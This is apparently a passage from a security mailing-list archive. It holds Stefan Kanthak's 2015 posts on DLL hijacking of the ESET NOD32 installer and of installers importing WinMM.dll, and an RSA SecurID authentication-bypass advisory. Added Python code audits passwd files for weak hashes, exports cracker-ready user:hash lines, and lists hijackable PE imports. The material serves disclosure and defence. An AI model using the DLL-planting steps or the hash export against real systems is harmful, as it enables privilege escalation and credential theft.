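        if kind == "unusable" or e["shell"] in NOLOGIN_SHELLS:
            continue
        found.append(dict(e, hash_kind=kind, weak_hash=kind in ("des-crypt", "md5-crypt"),
                          is_root=e["uid"] == 0))
    return found


def john_lines(accounts):
    """user:hash lines in the shape offline crackers accept."""
    return ["%s:%s" % (a["name"], a["hash"]) for a in accounts]


if __name__ == "__main__":
    for a in loginable_accounts(SAMPLE_PASSWD):
        print("%-8s uid=%-5d %-10s weak=%-5s root=%s" % (
            a["name"], a["uid"], a["hash_kind"], a["weak_hash"], a["is_root"]))
```

On the constructed sample this reports exactly root and xoFaeS, both with DES-crypt hashes; on a real image, every account this lists that the vendor documentation does not is a candidate backdoor, and any of them reachable over a plaintext service such as telnet is the finding in the advisory.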

Executable installers are vulnerable^WEVIL (case 13): ESET NOD32 antivirus installer allows remote code execution with escalation of privilege

2015-12-21 Thread Stefan Kanthak
Hi @ll,

the executable installer [°] of ESET's NOD32 antivirus,
eset_nod32_antivirus_live_installer_.exe, loads and executes
(at least) the rogue/bogus/malicious Cabinet.dll and DbgHelp.dll
eventually found in the directory it is started from ['] (the
"application directory").

For software downloaded with a web browser this is typically the
"Downloads" directory: see
,

and 

If Cabinet.dll or DbgHelp.dll get planted in the user's "Downloads"
directory per "drive-by download" (or "social engineering") this
vulnerability becomes a remote code execution.

Due to the application manifest embedded in the executable which
specifies "requireAdministrator" the installer is started with
administrative privileges ("protected" administrators are prompted
for consent, unprivileged standard users are prompted for an
administrator password); execution of Cabinet.dll or DbgHelp.dll
then results in an escalation of privilege!


Proof of concept/demonstration:
~~~

(verified on Windows XP, Windows Vista, Windows 7, Windows Server
2008 [R2]; should work on newer versions too)

1. visit , download
    and store
   it as Cabinet.dll in your "Downloads" directory, then copy it as
   DbgHelp.dll;

2. download eset_nod32_antivirus_live_installer_.exe and store it in
   your "Downloads" directory;

3. run eset_nod32_antivirus_live_installer_.exe from your "Downloads"
   directory;

4. notice the message boxes displayed from the DLLs placed in step 1.

PWNED!


Unsuspecting users who follow the guidance on ESET's web site


| (1) Download the .exe file to your computer and double-click
| it to start installation.

are the typical victims!

JFTR: I REALLY love (especially snakeoil) companies which don't
  protect or at least warn their customers from even the most
  trivial handling errors!


See  plus
 and the still unfinished
 for more details and why
executable installers (and self-extractors too) are bad.


Mitigation(s):
~~

0. DON'T USE EXECUTABLE INSTALLERS [°]!

   If your favourite applications are not distributed in the native
   installer package format of the resp. target platform: ask^WURGE
   their vendors/developers to provide native installation packages.
   If they don't: dump these applications, stay away from such cruft!

1. Turn off UAC's privilege elevation for standard users and installer
   detection for all users:

   
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
   "ConsentPromptBehaviorUser"=dword: ; Automatically deny elevation 
requests
   "EnableInstallerDetection"=dword:

   See 


2. NEVER execute files in UNSAFE directories (like "Downloads" and
   "%TEMP%")!

3. Deny execution (at least) in the "Downloads" directories and all
   "%TEMP%" directories and their subdirectories:

   * Add the NTFS ACE "(D;OIIO;WP;;;WD)" meaning "deny execution of
 files in this directory for everyone, inheritable to all files
 in all subdirectories" (use CACLS.EXE /S: for example);

   * Use "software restriction policies" resp. AppLocker.

   Consider applying either/both to every "%USERPROFILE%" as well as
   "%ALLUSERSPROFILE%" alias "%ProgramData%" and "%PUBLIC%": Windows
   doesn't place executables in these directories and beyond.

   See  as well as
    plus
   ,
   

   or  and finally
   !


stay tuned
Stefan Kanthak


[°] Self-extracting archives and executable installers are flawed^W
b(rainde)ad in concept and dangerous in practice.

DON'T USE SUCH CRUFT!
ALWAYS use the resp. target platforms native package and archive
format.

For Windows these are .INF (plus .CAB) and .MSI (plus .CAB),
introduced 20 years ago (with Windows 95 and Windows NT4) resp.
16 years ago (with Office 2000).

Both .INF and .MSI are "opened" by programs residing in
%SystemRoot%\System32\ which are therefore immune to this kind
of "DLL and EXE Search Order Hijacking" attack.
Since both .INF and .MSI access the contents of .CAB directly
they eliminate the attack vector "unsafe temporary 

Almost no resp. only some mitigation(s) for "DLL hijacking" via load-time dependencies

2015-12-21 Thread Stefan Kanthak
Hi @ll,

in  I showed
general mitigations for DLL hijacking via runtime dependencies
().

DLL hijacking is, however, also possible via load-time dependencies
()!

Example:

Quite some executable installers use the function timeGetTime()
()
implemented in WinMM.dll (and NO other function from WinMM.dll).

BUT WHY?

This function yields the same result as GetTickCount()
()
implemented in Kernel32.dll.

The notable difference: WinMM.dll is NOT in the list of "known DLLs"
(), so EVERY program
which uses timeGetTime() from WinMM.dll instead of GetTickCount()
will load a rogue WinMM.dll which exports timeGetTime from its
application directory.

This means: such programs are vulnerable to DLL hijacking unless
run from SAFE locations like %ProgramFiles% or %SystemRoot% where
unprivileged users can't place a rogue WinMM.dll etc. in the
program's application directory.

More general: if an executable installer links to functions not
provided by "known DLLs" for all supported versions of Windows it is
vulnerable to DLL hijacking via load-time dependencies, and there is
NO mitigation except to run it from a safe location!

Now that's a typical "catch 22": an installer's task is to write the
files of an application safely, i.e. without the possibility of
tampering, to safe locations, i.e. %ProgramFiles% and %SystemRoot%,
while the installer itself is located somewhere else, typically in
a user's "Downloads" or %TEMP% directory, which are, however, unsafe and
allow tampering via DLL hijacking.

TELL YOUR USERS! TELL YOUR CUSTOMERS! WARN THEM!

Or (better!): reduce your program's dependencies, i.e. stick to
the basics^Wfunctions provided by Kernel32.dll (and the other
"known DLLs") and eliminate the attack vectors for DLL hijacking
via WinMM.dll and other "unknown DLLs".

If you don't or can't: see above and WARN ALL YOUR USERS/CUSTOMERS!

JFTR: the list of "known DLLs" varies with different Windows versions!

Examples:

1. Version.dll was one of the "known DLLs" of Windows NT 5.x (resp.
   still is in Windows Embedded POSReady 2009): the (many) executable
   installers linked to its functions were/are therefore not
   vulnerable in Windows NT 5.x resp. Windows Embedded POSReady 2009.

   In newer versions of Windows Version.dll is none of the "known DLLs",
   so all executable installers using its functions became vulnerable
   to DLL hijacking then.

2. SetupAPI.dll is none of the "known DLLs" in Windows NT 5.x, but
   became so in newer versions of Windows: the (many) executable
   installers linked to its functions were/are vulnerable under Windows
   NT 5.x resp. Windows Embedded POSReady 2009, but ain't vulnerable
   any more in all newer versions of Windows.


Conclusion: executable installers which link to "unknown DLLs" are in
general unsafe for normal users.

The only SAFE option for general use is: DUMP executable installers.


stay tuned
Stefan Kanthak
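
Both posts above come down to one auditable property of an installer: which DLLs it binds at load time, and whether each of those is a KnownDLL on the Windows build it will run on. The following is an added example and not code from either post: a pure-Python walk of a PE image's import directory that lists every imported DLL with the functions pulled from it, then flags the ones that are not KnownDLLs. KNOWN_DLLS is a constructed subset stated as an assumption (the real list is the registry key HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs and, as the post stresses, varies by version), and SAMPLE_PE is a constructed non-executable PE32 that imports timeGetTime from WinMM.dll next to two Kernel32 functions, standing in for the installers described. Static imports are only the load-time half: a DLL the installer loads later with LoadLibrary (the Cabinet.dll/DbgHelp.dll case in the ESET post) does not appear in the import table and needs a runtime trace instead.

```python
"""List a PE image's load-time DLL imports and flag those that are not
KnownDLLs, i.e. the ones a rogue copy in the application directory would
satisfy.  Added example, not code from the posts; KNOWN_DLLS and SAMPLE_PE
are constructed."""
import struct

# Constructed KnownDLLs subset, an assumption for the demo.  The real list is
# the registry key HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs
# and differs per Windows version (the Version.dll / SetupAPI.dll examples).
KNOWN_DLLS = {"kernel32.dll", "user32.dll", "gdi32.dll", "advapi32.dll",
              "ole32.dll", "shell32.dll", "msvcrt.dll", "rpcrt4.dll"}


def pe_imports(data):
    """Walk the import directory of a PE32/PE32+ image and return
    {dll_name: [function name or '#ordinal', ...]} for its load-time imports."""
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    nsect, = struct.unpack_from("<H", data, coff + 2)
    opt_size, = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    magic, = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    pe32 = magic == 0x10B
    imp_rva, = struct.unpack_from("<I", data, opt + (96 if pe32 else 112) + 8)  # dir entry 1
    sections = []
    for i in range(nsect):
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, opt + opt_size + 40 * i + 8)
        sections.append((vaddr, max(vsize, rawsize), rawptr))

    def rva2off(rva):
        for vaddr, size, rawptr in sections:
            if vaddr <= rva < vaddr + size:
                return rawptr + (rva - vaddr)
        raise ValueError("RVA 0x%x maps to no section" % rva)

    def cstr(off):
        return data[off:data.index(b"\0", off)].decode("ascii")

    fmt, ordflag, step = ("<I", 1 << 31, 4) if pe32 else ("<Q", 1 << 63, 8)
    result = {}
    desc = rva2off(imp_rva) if imp_rva else None
    while desc is not None:
        oft, _, _, name_rva, ft = struct.unpack_from("<IIIII", data, desc)
        if name_rva == 0:
            break                                   # all-zero terminating descriptor
        funcs, thunk = [], rva2off(oft or ft)       # prefer the unbound lookup table
        while True:
            entry, = struct.unpack_from(fmt, data, thunk)
            if entry == 0:
                break
            funcs.append("#%d" % (entry & 0xFFFF) if entry & ordflag else cstr(rva2off(entry) + 2))
            thunk += step
        result[cstr(rva2off(name_rva))] = funcs
        desc += 20
    return result


def hijackable_imports(data, known_dlls=KNOWN_DLLS):
    """Load-time imports that are not KnownDLLs: these are looked up through the
    DLL search order, application directory first, when the image starts."""
    return {dll: funcs for dll, funcs in pe_imports(data).items() if dll.lower() not in known_dlls}


def build_pe32(imports):
    """Constructed minimal PE32 (not executable) whose one section is an import directory."""
    rva, fa = 0x1000, 0x200                         # section RVA, file alignment
    descs = bytearray(20 * (len(imports) + 1))      # descriptors + zero terminator
    body = bytearray()                              # names and thunk arrays after them

    def alloc(blob):
        body.extend(blob)
        return len(descs) + len(body) - len(blob)

    for i, (dll, funcs) in enumerate(imports.items()):
        name = alloc(dll.encode() + b"\0")
        hints = [alloc(b"\0\0" + f.encode() + b"\0") for f in funcs]     # hint + name
        thunks = struct.pack("<%dI" % (len(funcs) + 1), *([rva + h for h in hints] + [0]))
        oft, ft = alloc(thunks), alloc(thunks)
        struct.pack_into("<IIIII", descs, 20 * i, rva + oft, 0, 0, rva + name, rva + ft)
    section = bytes(descs + body)
    raw = -(-len(section) // fa) * fa
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBBIIIIII", 0x10B, 0, 0, 0, raw, 0, 0, rva, rva)
    opt += struct.pack("<IIIHHHHHHIIIIHHIIIIII", 0x400000, 0x1000, fa, 6, 0, 0, 0, 6, 0,
                       0, rva + 0x1000, fa, 0, 3, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[1] = (rva, len(descs))                     # IMAGE_DIRECTORY_ENTRY_IMPORT
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    sect = b".idata\0\0" + struct.pack("<IIIIIIHHI", len(section), rva, raw, fa, 0, 0, 0, 0, 0xC0000040)
    hdr = dos + coff + opt + sect
    return hdr + b"\0" * (fa - len(hdr)) + section + b"\0" * (raw - len(section))


# Constructed stand-in for an installer that uses timeGetTime() from WinMM.dll
SAMPLE_PE = build_pe32({"KERNEL32.dll": ["GetTickCount", "ExitProcess"],
                        "WINMM.dll": ["timeGetTime"]})

if __name__ == "__main__":
    for dll, funcs in hijackable_imports(SAMPLE_PE).items():
        print("hijackable load-time import: %s (%s)" % (dll, ", ".join(funcs)))
```

Point pe_imports() at a real installer (open(path, "rb").read()) and swap KNOWN_DLLS for the list exported from the target build's registry; the output is the set of DLL names an attacker would plant beside the installer, and the single timeGetTime import on WinMM.dll is exactly the kind of dependency the post says is not worth the exposure.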


ESA-2015-177: RSA SecurID(r) Web Agent Authentication Bypass Vulnerability

2015-12-21 Thread Security Alert

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

ESA-2015-177: RSA SecurID® Web Agent Authentication Bypass Vulnerability

EMC Identifier: ESA-2015-177

CVE Identifier: CVE-2015-6851

Severity Rating: 6.6 (AV:L/AC:L/Au:N/C:C/I:C/A:N)

Affected Products: 
   -   RSA SecurID® Web Agent versions prior to 8.0.
 
Summary:  
RSA SecurID Web Agent contains a patch that is designed to fix an authentication 
bypass vulnerability that may potentially be exploited by malicious users to 
compromise the confidentiality and integrity of the affected system. 

Details: 
RSA SecurID Web Agent could be affected by an authentication bypass vulnerability. 
In versions prior to 8.0, when the browser window was idle for more than a 
configured amount of time, the session was not terminated; instead, a privacy 
screen (a pop-up for re-authentication) was rendered. A malicious user with 
local or physical access to the end user's system would be able to dismiss the 
privacy screen using a DOM Inspector tool and continue using the Web Agent without 
re-authentication.
 
Recommendation: 
The following RSA SecurID Web Agent release contains resolution to this 
vulnerability:
   -   RSA SecurID Web Agent version 8.0

RSA recommends all customers upgrade at the earliest opportunity. 


Obtaining Downloads:
To obtain the latest RSA product downloads, log on to RSA SecurCare Online at 
https://knowledge.rsasecurity.com and click Products in the top navigation 
menu. Select the specific product whose download you want to obtain. Scroll to 
the section for the product download that you want and click on the link.

Obtaining Documentation:
To obtain RSA documentation, log on to RSA SecurCare Online at 
https://knowledge.rsasecurity.com and click Products in the top navigation 
menu. Select the specific product whose documentation you want to obtain. 
Scroll to the section for the product version that you want and click the set 
link.

Severity Rating:
For an explanation of Severity Ratings, refer to the Knowledge Base Article, 
“Security Advisories Severity Rating” at 
https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA 
recommends all customers take into account both the base score and any relevant 
temporal and environmental scores which may impact the potential severity 
associated with particular security vulnerability.

Obtaining More Information:
For more information about RSA products, visit the RSA web site at 
http://www.rsa.com.

Getting Support and Service:
For customers with current maintenance contracts, contact your local RSA 
Customer Support center with any additional questions regarding this RSA 
SecurCare Note. For contact telephone numbers or e-mail addresses, log on to 
RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help & 
Contact, and then click the Contact Us - Phone tab or the Contact Us - Email 
tab.

General Customer Support Information:
http://www.emc.com/support/rsa/index.htm

RSA SecurCare Online:
https://knowledge.rsasecurity.com

EOPS Policy:
RSA has a defined End of Primary Support policy associated with all major 
versions. Please refer to the link below for additional details. 
http://www.emc.com/support/rsa/eops/index.htm

SecurCare Online Security Advisories
Read and use the information in this RSA Security Advisory to assist in 
avoiding any situation that might arise from the problems described herein.  If 
you have any questions regarding this product alert, contact RSA Software 
Technical Support at 1-800-995-5095.  RSA Security LLC and its affiliates, 
including without limitation, its ultimate parent company, EMC Corporation, 
distribute RSA Security Advisories in order to bring to the attention of users 
of the affected RSA products, important security information.  RSA recommends 
that all users determine the applicability of this information to their 
individual situations and take appropriate action.   The information set forth 
herein is provided "as is" without warranty of any kind.   RSA disclaims all 
warranties, either express or implied, including the warranties of 
merchantability, fitness for a particular purpose, title and non-infringement.  
In no event shall RSA, its affiliates or its suppliers, be liable for any 
damages whatsoever including direct, indirect, incidental, consequential, loss 
of business profits or special damages, even if RSA, its affiliates or its 
suppliers have been advised of the possibility of such damages.  Some 
jurisdictions do not allow the exclusion or limitation of liability for 
consequential or incidental damages, so the foregoing limitation may not apply.

About RSA SecurCare Notes & Security Advisories Subscription
RSA SecurCare Notes & Security Advisories are targeted e-mail messages that RSA 
sends you based on the RSA product family you currently use. If you’d like to 
stop receiving RSA SecurCare Notes & Security Advisories, or if you’d like to 
change which RSA product family Notes & Security Advisories you